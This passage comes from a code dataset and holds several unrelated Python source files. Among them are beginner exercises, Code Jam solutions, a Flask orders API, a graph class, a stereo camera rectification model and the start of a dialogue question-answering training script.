'events_nu_'+str(ttrans)+'s_'+irf+'_'+str(int(tobscta))+'s_'+str(i+1)+'.fits'\n like['caldb'] = caldb\n like['irf'] = irf\n like['inmodel'] = 'nu_sources_'+str(i+1)+'.xml'\n like['outmodel'] = foutmodel\n like['debug'] = debug\n like['edisp'] = edisp\n like.execute()\n \n outfile = minidom.parse(foutmodel)\n srcs = outfile.getElementsByTagName('source')\n ts = float(srcs[0].attributes['ts'].value)\n srcsp = outfile.getElementsByTagName('parameter')\n normsp = float(srcsp[0].attributes['value'].value)\n normsp_error = float(srcsp[0].attributes['error'].value) \n \n if ts >= 25.:\n if normsp > 2. or normsp < 0.5:\n fake = str(i+1)+' '+str(ts)+' '+str(normsp)+' '+str(normsp_error)+' '+str(ra)+' '+str(dec)+' '+str(tsig)+'\\n'\n fakesrc.write(fake)\n else:\n real_nu = str(i+1)+' '+str(ts)+' '+str(normsp)+' '+str(normsp_error)+' '+str(ra)+' '+str(dec)+' '+str(tsig)+'\\n'\n realsrc.write(real_nu)\n else:\n lowreal_nu = str(i+1)+' '+str(ts)+' '+str(normsp)+' '+str(normsp_error)+' '+str(ra)+' '+str(dec)+' '+str(tsig)+'\\n'\n lowrealsrc.write(lowreal_nu)\n\nrealsrc.close()\nlowrealsrc.close()\nfakesrc.close()\n","repo_name":"Konstancja/cta-neutrino","sub_path":"nu_trans_simlike.py","file_name":"nu_trans_simlike.py","file_ext":"py","file_size_in_byte":5570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71011824194","text":"# Introduction to Python\r\n\r\n#####################################################################################################################################\r\n\r\n'''\r\n1.\r\nWrite a program which will find factors of given number and find whether the\r\nfactor is even or odd. Hint: Use Loop with if-else statements\r\n'''\r\n\r\nprint('Answer for Question 1 Begins ')\r\n\r\nclass UnAcceptedValueError(Exception):\r\n def __init__(self, data):\r\n self.data = data\r\n def __str__(self):\r\n return repr(self.data)\r\n\r\nwhile True:\r\n try:\r\n input_number = int(input(\"Enter a natural number : \"))\r\n if input_number<=0:\r\n raise UnAcceptedValueError(\"Sorry entered number cannot be less than 1 ! Please try again ...\")\r\n break\r\n except UnAcceptedValueError as e:\r\n print(\"Received error:\", e.data)\r\n except ValueError:\r\n print(\"No valid natural number entered ! Please try again ...\")\r\n print(\"Hint : Natural number starts with 1 !!!\")\r\n\r\ncounter=1\r\nfactors_of_input=[]\r\nwhile input_number>=counter:\r\n if input_number%counter==0:\r\n factors_of_input.append(counter)\r\n counter += 1\r\n else:\r\n counter += 1\r\n continue\r\n\r\nlen_of_factors=len(factors_of_input)\r\n\r\nif len_of_factors%2==0:\r\n even_or_odd='Even'\r\nelse:\r\n even_or_odd='Odd'\r\n\r\nprint('Factors of input number',input_number,'are :',factors_of_input,'& the factor is',even_or_odd)\r\nprint('\\n')\r\n\r\n#####################################################################################################################################\r\n\r\n'''\r\n2.\r\nWrite a code which accepts a sequence of words as input and prints the words in a sequence after sorting them alphabetically.\r\nHint: In case of input data being supplied to the question, it should be assumed to be a console input\r\n'''\r\nprint('Answer for Question 2 Begins ')\r\n\r\ninput_word=str(input(\"Enter a word : \"))\r\nintermediate_word=(input_word.split(sep=\" \"))\r\nold_word=intermediate_word\r\nintermediate_word.sort(key=lambda y: y.lower())\r\nsorted_word=' '.join(map(str, intermediate_word))\r\nprint('Word before sorting : ',input_word)\r\nprint('Word after sorting : ',sorted_word)\r\nprint('\\n')\r\n\r\n#####################################################################################################################################\r\n\r\n'''\r\n3.\r\nWrite a program, which will find all the numbers between 1000 and 3000 (both included) such that each digit of a number\r\nis an even number. The numbers obtained should be printed in a comma separated sequence on a single line.\r\nHint: In case of input data being supplied to the question, it should be assumed to be a console input.\r\nDivide each digit with 2 and verify is it even or no\r\n'''\r\n\r\nprint('Answer for Question 3 Begins ')\r\n\r\nfor i in range(1000,3001):\r\n split_numbers = [int(j) for j in str(i)]\r\n if ((split_numbers[0] % 2 == 0) and (split_numbers[1] % 2 == 0) and (split_numbers[2] % 2 == 0) and (split_numbers[3] % 2 == 0)):\r\n listToStr = ''.join(map(str, split_numbers))\r\n print(listToStr, end=\",\")\r\n else:\r\n pass\r\n\r\nprint('\\n')\r\n\r\n######################################################################################################################################\r\n\r\n'''\r\n4.\r\nWrite a program that accepts a sentence and calculate the number of letters and digits.\r\nSuppose if the entered string is: Python0325 Then the output will be:\r\nLETTERS: 6\r\nDIGITS:4\r\nHint: Use built -in functions of string.\r\n'''\r\nprint('Answer for Question 4 Begins ')\r\n\r\ntext_input=input('Enter a Letter: ')\r\n\r\nnumeric_count=0\r\nalphabet_count=0\r\n\r\nfor letter in text_input:\r\n if letter.isnumeric()==True:\r\n numeric_count+=1\r\n elif letter.isalpha()==True:\r\n alphabet_count+=1\r\n else:\r\n pass\r\nprint('LETTERS: ',alphabet_count)\r\nprint('DIGITS: ',numeric_count)\r\nprint('\\n')\r\n######################################################################################################################################\r\n\r\n'''\r\n5.\r\nDesign a code which will find the given number is Palindrome number or not.\r\nHint: Use built -in functions of string.\r\n'''\r\nprint('Answer for Question 5 Begins ')\r\n\r\nwhile True:\r\n try:\r\n user_input = int(input(\"Please Enter a non negative number : \"))\r\n user_input_string = str(user_input)\r\n my_list = []\r\n for number in user_input_string:\r\n my_list.append(number)\r\n\r\n reversed_user_input = list(reversed(my_list))\r\n\r\n combined_reversed_string = ''.join(reversed_user_input)\r\n combined_reversed_number = int(combined_reversed_string)\r\n\r\n if user_input == combined_reversed_number:\r\n print('The given number is a Palindrome ')\r\n else:\r\n print('The given number is not a Palindrome')\r\n break\r\n except ValueError:\r\n print(\"Exception : Negative or Alphanumeric entered \\n\")\r\nprint('\\n')\r\n######################################################################################################################################\r\n","repo_name":"alvayash/Edureka_Assignments_Python_Programming_Certification_Training-","sub_path":"Assignment_Module_1_Introduction_to_Python.py","file_name":"Assignment_Module_1_Introduction_to_Python.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"18867594405","text":"from django.urls import path\n\nfrom .views import (\n CourseListAPIView,\n CourseDetailAPIView,\n MajorCodeListAPIView,\n)\n\napp_name = 'course_api'\n\nurlpatterns = [\n path('courses/', CourseListAPIView.as_view(), name='list_api'),\n path('detail/', CourseDetailAPIView.as_view(), name='list_detail'),\n path('major-codes', MajorCodeListAPIView.as_view(), name='major_code_list_api'),\n]\n","repo_name":"ITUscheduler/ITUscheduler","sub_path":"ituscheduler/api/rest_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"23583836901","text":"from sys import argv\nimport math\n\nINPUT_FILE = argv[1]\nOUTPUT_FILE = argv[2]\n\ndef oscillate(l):\n splitting = int(math.ceil(len(l)/2))\n first_half = l[:splitting]\n second_half = l[splitting:]\n new_results = [False]*total\n for i,n in enumerate(first_half):\n new_results[2*i] = n\n for i,n in enumerate(second_half):\n new_results[2*i+1] = n\n return new_results\n\nwith open(INPUT_FILE) as f1:\n with open(OUTPUT_FILE,'w') as f2:\n current = f1.readline()\n current = f1.readline()[:-1]\n case = 1\n while current!='':\n totals = {}\n total,r,o,y,g,b,v = [int(q) for q in current.split(' ')]\n totals['R'] = r\n totals['O'] = o\n totals['Y'] = y\n totals['G'] = g\n totals['B'] = b\n totals['V'] = v\n if max(r,y,b)>total/2:\n answer = 'IMPOSSIBLE'\n else:\n stringed = []\n for k in sorted(totals.keys(),key=lambda x:-totals[x]):\n for n in range(totals[k]):\n stringed.append(k)\n assignments = oscillate(stringed)\n answer = ''.join(assignments)\n f2.write('Case #%d: %s\\n'%(case,answer))\n case += 1\n current = f1.readline()[:-1]\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_207/616.py","file_name":"616.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23568891261","text":"with open(\"input.txt\",\"r\") as file:\n\tlines=file.read().splitlines()\nline_n=0\noutlines=[]\nt=int(lines[line_n])\nline_n=line_n+1\nfor i in range(t):\n\tn,k=map(int,lines[line_n].split(\" \"))\n\tline_n=line_n+1\n\tfilled=[0,n+1]\n\tfor j in range(k):\n\t\tgap=-1\n\t\tpos=-1\n\t\tfor l in xrange(len(filled)-1,0,-1):\n\t\t\tif(filled[l]-filled[l-1]-1>gap):\n\t\t\t\tgap=filled[l]-filled[l-1]-1\n\t\t\t\tpos=l-1\n\t\tmid = (filled[pos+1]+filled[pos])/2\n\t\tif(j==k-1):\n\t\t\ta = mid-filled[pos]-1\n\t\t\tb = filled[pos+1]-mid-1\n\t\t\tif(a>b):\n\t\t\t\toutlines.append(\"Case #\"+str(i+1)+\": \"+str(a)+\" \"+str(b))\n\t\t\telse:\n\t\t\t\toutlines.append(\"Case #\"+str(i+1)+\": \"+str(b)+\" \"+str(a)) \n\t\t\tbreak\n\t\tfilled.append(mid)\n\t\tfilled.sort()\nwith open(\"output.txt\",\"w\") as file:\n\tfor line in outlines:\n\t\tfile.write(line+\"\\n\")","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/1956.py","file_name":"1956.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23565461511","text":"import sys\n\ndef readFile(filename):\n\tL = []\n\twith open(filename, 'r') as fp:\n\t\tT = int(fp.readline())\n\t\tfor i in range(T):\n\t\t\tL.append(fp.readline().strip())\n\treturn T, L\t\n\ndef solve(S):\n\tif len(S) == 1:\n\t\treturn S[0]\n\tS = [int(s) for s in S]\n\tn = len(S)\n\twhile True:\n\t\tflag = False\n\t\tfor i in range(n-1):\n\t\t\tif S[i] > S[i+1]:\n\t\t\t\tflag = True\n\t\t\t\tbreak;\n\t\tif flag:\n\t\t\tS[i] = S[i]-1\n\t\t\tif S[i] < 0:\n\t\t\t\tS[i] = 9\n\t\t\tfor j in range(i+1, n):\n\t\t\t\tS[j] = 9\n\t\telse:\n\t\t\tbreak\n\toutput = ''.join([str(s) for s in S])\n\ti = 0\n\twhile i < len(S) and output[i] == '0':\n\t\ti += 1\n\toutput = output[i:]\n\treturn output\n\nif __name__ == \"__main__\":\n\tinput_filename = sys.argv[1]\n\tT, L = readFile(input_filename)\n\toutput_fp = open('output.txt', 'w')\n\tfor i in range(T):\n\t\tresult = \"Case #{}: {}\".format(i+1, solve(L[i]))\n\t\toutput_fp.write(result)\n\t\tif not i==T-1:\n\t\t\toutput_fp.write('\\n')\n\t\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/809.py","file_name":"809.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72815308674","text":"import django_filters\nfrom django import forms\nfrom .models import Traffic\n\nclass TrafficFilter(django_filters.FilterSet):\n fulltext = django_filters.CharFilter(lookup_expr='icontains')\n class Meta:\n model = Traffic\n fields = {'PIR', 'status', 'fulltext','user'}\n help_texts={\n 'fulltext': None,\n 'PIR': None,\n 'status': None,\n 'user': None,\n }\n labels = {\n 'PIR': ('Filter by PIR'),\n 'status': ('Filter by status'),\n 'fulltext': ('Filter from traffic text'),\n 'tags' : ('Filter by tags'),\n }\n widgets = {\n 'PIR': forms.TextInput(attrs={'placeholder': 'Filter by PIR'}),\n }\n ","repo_name":"ecuadrafoy/4cent","sub_path":"logger/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74959833475","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# @file pinhole.py\n# @brief\n# @author QRS\n# @version 1.0\n# @date 2023-01-09 21:46\n\nimport cv2\nimport numpy as np\n\n\nclass PinHoleModel(object):\n '''\n\n '''\n\n def __init__(self, lazy=False):\n if lazy:\n # stereoRectify(\n # cameraMatrix1, distCoeffs1, cameraMatrix2, distCoeffs2, imageSize,\n # R, T[, R1[, R2[, P1[, P2[, Q[, flags[, alpha[, newImageSize]]]]]]]])\n # -> R1, R2, P1, P2, Q, validPixROI1, validPixROI2\n # also do: R1, R2, P1, P2, Q, *_ = cv2.stereoRectify()\n self.stereo_rectify = lambda *argv, **kwargs: cv2.stereoRectify(*argv, **kwargs)[:5]\n\n def stereo_rectify(\n self,\n camera_matrix1, dist_coeffs1,\n camera_matrix2, dist_coeffs2,\n image_size, R, T, flags,\n newImageSize=None, balance=None, fov_scale=None):\n\n '''\n Args:\n R 两个相机坐标系统的旋转矩阵(2 to 1)\n T 两个相机坐标系统的平移矩阵(2 to 1)\n Returns:\n R1: 第1个相机校正旋转矩阵(3x3)\n R2: 第2个相机校正旋转矩阵(3x3)\n P1: 第1个相机校正投影矩阵(3x4)\n P2: 第2个相机校正投影矩阵(3x4)\n Q: 重投影矩阵(4x4)\n '''\n\n # https://zhuanlan.zhihu.com/p/348846552\n # 平移向量/旋转角度向量\n tvec = T.astype(np.float64).reshape((3, 1))\n rvec, _ = cv2.Rodrigues(R.astype(np.float64)) # 模表示旋转角度\n\n rvec *= -0.5 # 旋转左右相机使它们的基坐标系平行(但不一定共面)\n r_r, _ = cv2.Rodrigues(rvec)\n\n t = r_r @ tvec # 重新计算新基下的平移向量\n uu = np.array([1 if t[0, 0] > 0 else -1, 0, 0]).reshape((3, 1))\n\n # ^ e3 叉乘得到垂直e1,e2平面的法向量\n # │\n # │ ^ 相机2平分后的平移向量(t)\n # ───────┼───────────/ e2\n # ╱ │ ╱\n # ╱ │ ╱\n # ╱ ╱ theta\n # ╱─────────────────────> e1 相机1坐标系(1,0,0)\n ww = np.cross(t, uu, axis=0)\n nw = np.linalg.norm(ww)\n if nw > 0.0:\n # 左右相机各自旋转, 将原左(右)相机的X轴于平移向量t重合, 即绕这两个向量的法向量旋转\n # 通过每一角度对应的模长计算旋转角度\n # 模表示旋转角度\n ww *= np.arccos(np.abs(t[0]) / np.linalg.norm(t)) / nw\n\n wr, _ = cv2.Rodrigues(ww)\n\n # 同行\n ri1 = wr @ r_r.T\n R1 = ri1.astype(np.float64)\n ri2 = wr @ r_r\n R2 = ri2.astype(np.float64)\n tnew = ri2 @ tvec\n\n balance = min(max(balance, 0), 1) if balance is not None else 0.0\n\n def _calculate_projection(K, D, R): # {{{\n w, h = image_size\n\n _points = np.expand_dims(np.array(\n [[w / 2, 0],\n [w, h / 2],\n [w / 2, h],\n [0, h / 2]], dtype=np.float64), 1)\n\n points = np.squeeze(self.undistort_points(_points, K, D, R=R))\n cn = np.mean(points, axis=0).flatten()\n\n aspect_ratio = K[0, 0] / K[1, 1]\n\n cn[1] *= aspect_ratio\n points[:, 1] *= aspect_ratio\n\n minx = points[:, 0].min()\n maxx = points[:, 0].max()\n miny = points[:, 1].min()\n maxy = points[:, 1].max()\n\n f1 = w * 0.5 / (cn[0] - minx)\n f2 = w * 0.5 / (maxx - cn[0])\n f3 = h * 0.5 * aspect_ratio / (cn[1] - miny)\n f4 = h * 0.5 * aspect_ratio / (maxy - cn[1])\n\n fmin = min(f1, min(f2, min(f3, f4)))\n fmax = max(f1, max(f2, max(f3, f4)))\n\n f = balance * fmin + (1.0 - balance) * fmax\n\n f *= 1.0 / fov_scale if fov_scale is not None and fov_scale > 0 else 1.0\n\n new_f = np.array((f, f))\n new_c = -cn * f + np.array((w, h * aspect_ratio)) * 0.5\n\n new_f[1] /= aspect_ratio\n new_c[1] /= aspect_ratio\n\n if newImageSize is not None:\n rx = newImageSize[0] / image_size[0]\n ry = newImageSize[1] / image_size[1]\n\n new_f[0] *= rx\n new_f[1] *= ry\n new_c[0] *= rx\n new_c[1] *= ry\n\n P = np.array([[new_f[0], 0, new_c[0]],\n [0, new_f[1], new_c[1]],\n [0, 0, 1]])\n return P # }}}\n\n new_k1 = _calculate_projection(camera_matrix1, dist_coeffs1, R1)\n new_k2 = _calculate_projection(camera_matrix2, dist_coeffs2, R2)\n\n fc_new = min(new_k1[1, 1], new_k2[1, 1])\n cc_new = np.array([[new_k1[0, 2], new_k1[1, 2]], [new_k2[0, 2], new_k2[1, 2]]])\n\n if flags & cv2.CALIB_ZERO_DISPARITY == cv2.CALIB_ZERO_DISPARITY:\n cc_new[0, :] = (cc_new[0, :] + cc_new[1, :]) * 0.5\n cc_new[1, :] = cc_new[0, :]\n else:\n cc_new[0, 1] = (cc_new[0, 1] + cc_new[1, 1]) * 0.5\n cc_new[1, 1] = cc_new[0, 1]\n\n P1 = np.array([[fc_new, 0, cc_new[0, 0], 0],\n [0, fc_new, cc_new[0, 1], 0],\n [0, 0, 1, 0]], dtype=np.float64)\n\n P2 = np.array([[fc_new, 0, cc_new[1, 0], tnew[0][0] * fc_new], # baseline * focal length;,\n [0, fc_new, cc_new[1, 1], 0],\n [0, 0, 1, 0]], dtype=np.float64)\n\n Q = np.array([[1, 0, 0, -cc_new[0, 0]],\n [0, 1, 0, -cc_new[0, 1]],\n [0, 0, 0, fc_new],\n [0, 0, -1. / tnew[0][0], (cc_new[0, 0] - cc_new[1, 0]) / tnew[0][0]]], dtype=np.float64)\n\n return R1, R2, P1, P2, Q\n\n def undistort_rectify_map(self, camera_matrix, dist_coeffs, R, new_camera_matrix, image_size, m1type):\n return cv2.initUndistortRectifyMap(\n camera_matrix,\n dist_coeffs, R,\n new_camera_matrix,\n image_size, m1type)\n\n def undistort_points(self, points, camera_matrix, dist_coeffs, R=None, P=None):\n return cv2.undistortPoints(points, camera_matrix, dist_coeffs, R=R)\n\n\nclass PinHoleRadTanModel(PinHoleModel):\n pass\n","repo_name":"qrsforever/vision-mcs","sub_path":"app/vmcs/core/camera/models/pinhole.py","file_name":"pinhole.py","file_ext":"py","file_size_in_byte":6452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23601730781","text":"'''\r\nCreated on May 8, 2010\r\n\r\n@author: qfel13\r\n'''\r\n\r\nif __name__ == '__main__':\r\n\tsol = {}\r\n\tstep = {}\r\n\tfor i in xrange(1, 31):\r\n\t\tsol[i] = 0\r\n\t\tstep[i] = 2**i\r\n\t\tfor j in xrange(i):\r\n\t\t\tsol[i] += 2**j\r\n\t\r\n\tf = open(\"A-large.in\", \"r\")\r\n\tfout = open(\"A-large.out\", \"w\")\r\n\tcaseCount = int(f.readline())\r\n\tfor case in xrange(caseCount):\r\n\t\ta = f.readline().split(\" \", 1)\r\n\t\tn = int (a[0])\r\n\t\tk = int (a[1])\r\n\t\t\r\n\t\tfout.write(\"Case #\" + str(case + 1) + \": \")\r\n\t\tif (k%step[n]) == sol[n]:\r\n\t\t\tfout.write(\"ON\\n\")\r\n\t\telse:\r\n\t\t\tfout.write(\"OFF\\n\")","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_53/727.py","file_name":"727.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12737151595","text":"#!/usr/bin/python3\n\"\"\" Objects that handle all default RestFul API actions for orders \"\"\"\nfrom models.order import Order\nfrom models.food import Food\nfrom models.drink import Drink\nfrom models.store import Store\nfrom models import storage\nfrom api.v1.views import app_views\nfrom flask import abort, jsonify, make_response, request\n\n@app_views.route('/stores//orders', methods=['GET'],\n strict_slashes=False)\ndef get_orderids(store_id):\n \"\"\"\n Retrieves the list of all order objects\n of a specific Store, or a specific Store\n \"\"\"\n list_orders = []\n store = storage.get(Store, store_id)\n if not store:\n abort(404)\n for order in store.orders:\n list_orders.append(order.to_dict())\n\n return jsonify(list_orders)\n\n@app_views.route('/orders//', methods=['GET'], strict_slashes=False)\ndef get_orders(order_id):\n \"\"\"\n Retrieves a specific order based on id\n \"\"\"\n order = storage.get(Order, order_id)\n if not order:\n abort(404)\n return jsonify(order.to_dict())\n\n\n@app_views.route('/orders/', methods=['DELETE'], strict_slashes=False)\ndef delete_order(order_id):\n \"\"\"\n Deletes an order based on id provided\n \"\"\"\n order = storage.get(Order, order_id)\n\n if not order:\n abort(404)\n storage.delete(order)\n storage.save()\n\n return make_response(jsonify({}), 200)\n\n\n@app_views.route('/stores//orders', methods=['POST'],\n strict_slashes=False)\ndef post_order(store_id):\n \"\"\"\n Creates an Order to a Store\n \"\"\"\n store = storage.get(Store, store_id)\n if not store:\n abort(404)\n\n if not request.get_json():\n abort(400, description=\"Not a JSON\")\n data = request.get_json()\n\n if 'order_number' not in request.get_json():\n abort(400, description=\"Missing order number\")\n if 'user_name' not in request.get_json():\n abort(400, description=\"Missing user name\")\n\n data['store_id'] = store_id\n instance = Order(**data)\n instance.save()\n return make_response(jsonify(instance.to_dict()), 201)\n\n\n@app_views.route('/orders/', methods=['PUT'], strict_slashes=False)\ndef put_order(order_id):\n \"\"\"\n Updates an Order\n \"\"\"\n order = storage.get(Order, order_id)\n if not order:\n abort(404)\n\n if not request.get_json():\n abort(400, description=\"Not a JSON\")\n\n ignore = ['id', 'store_id', 'created_at', 'updated_at']\n\n data = request.get_json()\n for key, value in data.items():\n if key not in ignore:\n setattr(order, key, value)\n storage.save()\n return make_response(jsonify(food.to_dict()), 200)\n","repo_name":"ffelipegupe/fastq","sub_path":"api/v1/views/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31943587561","text":"from collections import defaultdict\nfrom copy import deepcopy\n\nfrom pybbn.graph.edge import EdgeType\n\n\nclass Graph(object):\n \"\"\"\n Graph.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Ctor.\n \"\"\"\n self.nodes = dict()\n self.edges = dict()\n self.edge_map = defaultdict(set)\n self.neighbors = defaultdict(set)\n\n def get_neighbors(self, id):\n \"\"\"\n Gets the neighbors of the specified node.\n\n :param id: Node id.\n :return: Set of neighbors of the specified node.\n \"\"\"\n return self.neighbors[id]\n\n def get_node(self, id):\n \"\"\"\n Gets the node associated with the specified id.\n\n :param id: Node id.\n :return: Node.\n \"\"\"\n return self.nodes[id]\n\n def get_nodes(self):\n \"\"\"\n Gets all the nodes.\n\n :return: List of nodes.\n \"\"\"\n return self.nodes.values()\n\n def get_edges(self):\n \"\"\"\n Gets all the edges.\n\n :return: List of edges.\n \"\"\"\n return [edge for edge in self.edges.values()]\n\n def add_node(self, node):\n \"\"\"\n Adds a node.\n\n :param node: Node.\n :return: This graph.\n \"\"\"\n if node.id not in self.nodes:\n self.nodes[node.id] = node\n return self\n\n def add_edge(self, edge):\n \"\"\"\n Adds an edge.\n\n :param edge: Edge.\n :return: This graph.\n \"\"\"\n self.add_node(edge.i)\n self.add_node(edge.j)\n\n if self.__shouldadd__(edge):\n self.edges[edge.key] = edge\n self.edge_map[edge.i.id].add(edge.j.id)\n if EdgeType.UNDIRECTED == edge.type:\n self.edge_map[edge.j.id].add(edge.i.id)\n\n self.neighbors[edge.i.id].add(edge.j.id)\n self.neighbors[edge.j.id].add(edge.i.id)\n\n self.__edge_added__(edge)\n\n return self\n\n def __edge_added__(self, edge):\n \"\"\"\n Callback listener for sub-classes when an edge has been added.\n\n :param edge: Edge.\n :return: None.\n \"\"\"\n pass\n\n def __shouldadd__(self, edge):\n \"\"\"\n Checks if the specified edge should be added.\n\n :param edge: Edge.\n :return: A boolean indicating if the edge should be added.\n \"\"\"\n lhs = edge.i\n rhs = edge.j\n\n if lhs.id == rhs.id:\n return False\n\n if EdgeType.UNDIRECTED == edge.type:\n if lhs.id not in self.edge_map[rhs.id] or rhs.id not in self.edge_map[lhs.id]:\n return True\n else:\n if rhs.id not in self.edge_map[lhs.id]:\n return True\n\n return False\n\n def edge_exists(self, id1, id2):\n \"\"\"\n Checks if the specified edge id1 -- id2 exists.\n\n :param id1: Node id.\n :param id2: Node id.\n :return: A boolean indicating if the specified edge exists.\n \"\"\"\n if id1 in self.edge_map and id2 in self.edge_map[id1]:\n return True\n if id2 in self.edge_map and id1 in self.edge_map[id2]:\n return True\n return False\n\n def remove_node(self, id):\n \"\"\"\n Removes a node from the graph.\n\n :param id: Node id.\n \"\"\"\n self.nodes.pop(id, None)\n self.edge_map.pop(id, None)\n self.neighbors.pop(id, None)\n\n for k, v in self.edge_map.items():\n if id in v:\n v.remove(id)\n\n for k, v in self.neighbors.items():\n if id in v:\n v.remove(id)\n\n def __str__(self):\n nodes = str.join('\\n', [x.__str__() for x in self.nodes.values()])\n edges = str.join('\\n', [x.__str__() for x in self.edges.values()])\n return nodes + '\\n' + edges\n\n def __copy__(self):\n cls = self.__class__\n result = cls.__new__(cls)\n result.__dict__.update(self.__dict__)\n return result\n\n def __deepcopy__(self, memodict={}):\n cls = self.__class__\n result = cls.__new__(cls)\n memodict[id(self)] = result\n for k, v in self.__dict__.items():\n setattr(result, k, deepcopy(v, memodict))\n return result\n\n\nclass Ug(Graph):\n \"\"\"\n Undirected graph.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Ctor.\n \"\"\"\n Graph.__init__(self)\n","repo_name":"vangj/py-bbn","sub_path":"pybbn/graph/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"61"} +{"seq_id":"14014928488","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nselection sort 选择排序\n~~~~~~~~~~~~~~~~~~~~~~\n\n1. 在未排序序列中找到最小(大)元素,存放到排序序列的起始位置。\n2. 再从剩余未排序元素中继续寻找最小(大)元素,然后放到已排序序列的末尾。\n3. 以此类推,直到所有元素均排序完毕。\n\n\"\"\"\n\ndef select_sort(arry):\n n = len(arry)\n for i in range(0, n):\n min = i #最小元素下标标记\n for j in range(i+1, n):\n if arry[j] < arry[min]:\n min = j #找到最小值的下标\n arry[min], arry[i] = arry[i], arry[min]\n return arry\n\n\n# example\nb = [x for x in range(1000)] # array from 0 to 999\nimport random\nrandom.shuffle(b) # randomly shuffle\nselect_sort(b)\n\n# timer\nimport time\ntic = time.time()\nselect_sort(b)\ntoc = time.time() - tic\nprint(toc)\n","repo_name":"randi219/learnPython","sub_path":"sorting/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26759857969","text":"import json\r\nimport torch\r\nimport numpy as np\r\nimport random\r\nimport warnings\r\nfrom tqdm import tqdm\r\nfrom torch.utils.data import DataLoader, RandomSampler, SequentialSampler\r\nfrom transformers import BertTokenizerFast, ElectraTokenizerFast\r\nfrom transformers import BertConfig, ElectraConfig\r\nfrom transformers import AdamW, get_linear_schedule_with_warmup\r\nfrom utils.evaluate_v2 import main as evaluate_on_squad, EVAL_OPTS\r\n\r\nfrom utils.config import *\r\n\r\nfrom models.ours import LIMN\r\nfrom models.baseline import baseline, SUP\r\n\r\nfrom utils.utils_split import get_dataset, collate_fn\r\n\r\n# if using BERT-base, change the utils\r\n# from utils.random_utils_split import get_dataset, collate_fn\r\n\r\nMRC_MODEL_LIST = [baseline, SUP, LIMN]\r\n\r\nMODEL_CLASSES = {\r\n 'bert': (BertConfig, BertTokenizerFast),\r\n 'electra': (ElectraConfig, ElectraTokenizerFast)\r\n}\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\ndevice = torch.device(\"cuda:\" + str(args.cuda)) if USE_CUDA else torch.device(\"cpu\")\r\ntrain_path = os.path.join(args.data_path, \"FriendsQA/friendsqa_trn.json\")\r\neval_path = os.path.join(args.data_path, \"FriendsQA/friendsqa_dev.json\")\r\ntest_path = os.path.join(args.data_path, \"FriendsQA/friendsqa_tst.json\")\r\nconfig_class, tokenizer_class = MODEL_CLASSES[args.model_type]\r\n\r\nMRC_NAME = ['_baseline_', '_SUP_', '_LIMN_']\r\n\r\nmodel_save_path = \"./saves/checkpoint/\" + args.model_type + MRC_NAME[args.model_num] + \"FriendsQA_\" + str(\r\n args.learning_rate) + \"_T\" + str(args.ts_num) + \"_M\" + str(args.mha_layer_num) + '.pkl'\r\n\r\nresult_json = \"./saves/result/\" + args.model_type + MRC_NAME[args.model_num] + \"FriendsQA_\" + str(\r\n args.learning_rate) + \"_T\" + str(args.ts_num) + \"_M\" + str(args.mha_layer_num) + '.json'\r\n\r\npretrained_model_path = \"./saves/checkpoint/\" + args.model_type + \"_SQuAD_\" + str(6e-06) + \"_T\" + str(\r\n args.ts_num) + '.pkl'\r\n\r\n\r\ndef set_seed():\r\n random.seed(args.seed)\r\n np.random.seed(args.seed)\r\n torch.manual_seed(args.seed)\r\n if USE_CUDA:\r\n torch.cuda.manual_seed(args.seed)\r\n torch.cuda.manual_seed_all(args.seed)\r\n\r\n\r\ndef train(model, train_loader, eval_dataloader, test_dataloader, tokenizer):\r\n save_dev_f1 = 0\r\n save_dev_em = 0\r\n\r\n print(\"Traning arguments:\")\r\n print(args)\r\n\r\n patience_turns = 0\r\n model.train()\r\n model.zero_grad()\r\n\r\n # freeze memory encoder\r\n for name, param in model.memory_encoder.named_parameters():\r\n param.requires_grad = False\r\n print(name, param.requires_grad)\r\n print(pretrained_model_path)\r\n\r\n no_decay = ['bias', 'LayerNorm.weight']\r\n optimizer_grouped_parameters = [\r\n {'params': [p for n, p in model.named_parameters() if\r\n (not any(nd in n for nd in no_decay)) and p.requires_grad == True],\r\n 'weight_decay': args.weight_decay},\r\n {'params': [p for n, p in model.named_parameters() if\r\n 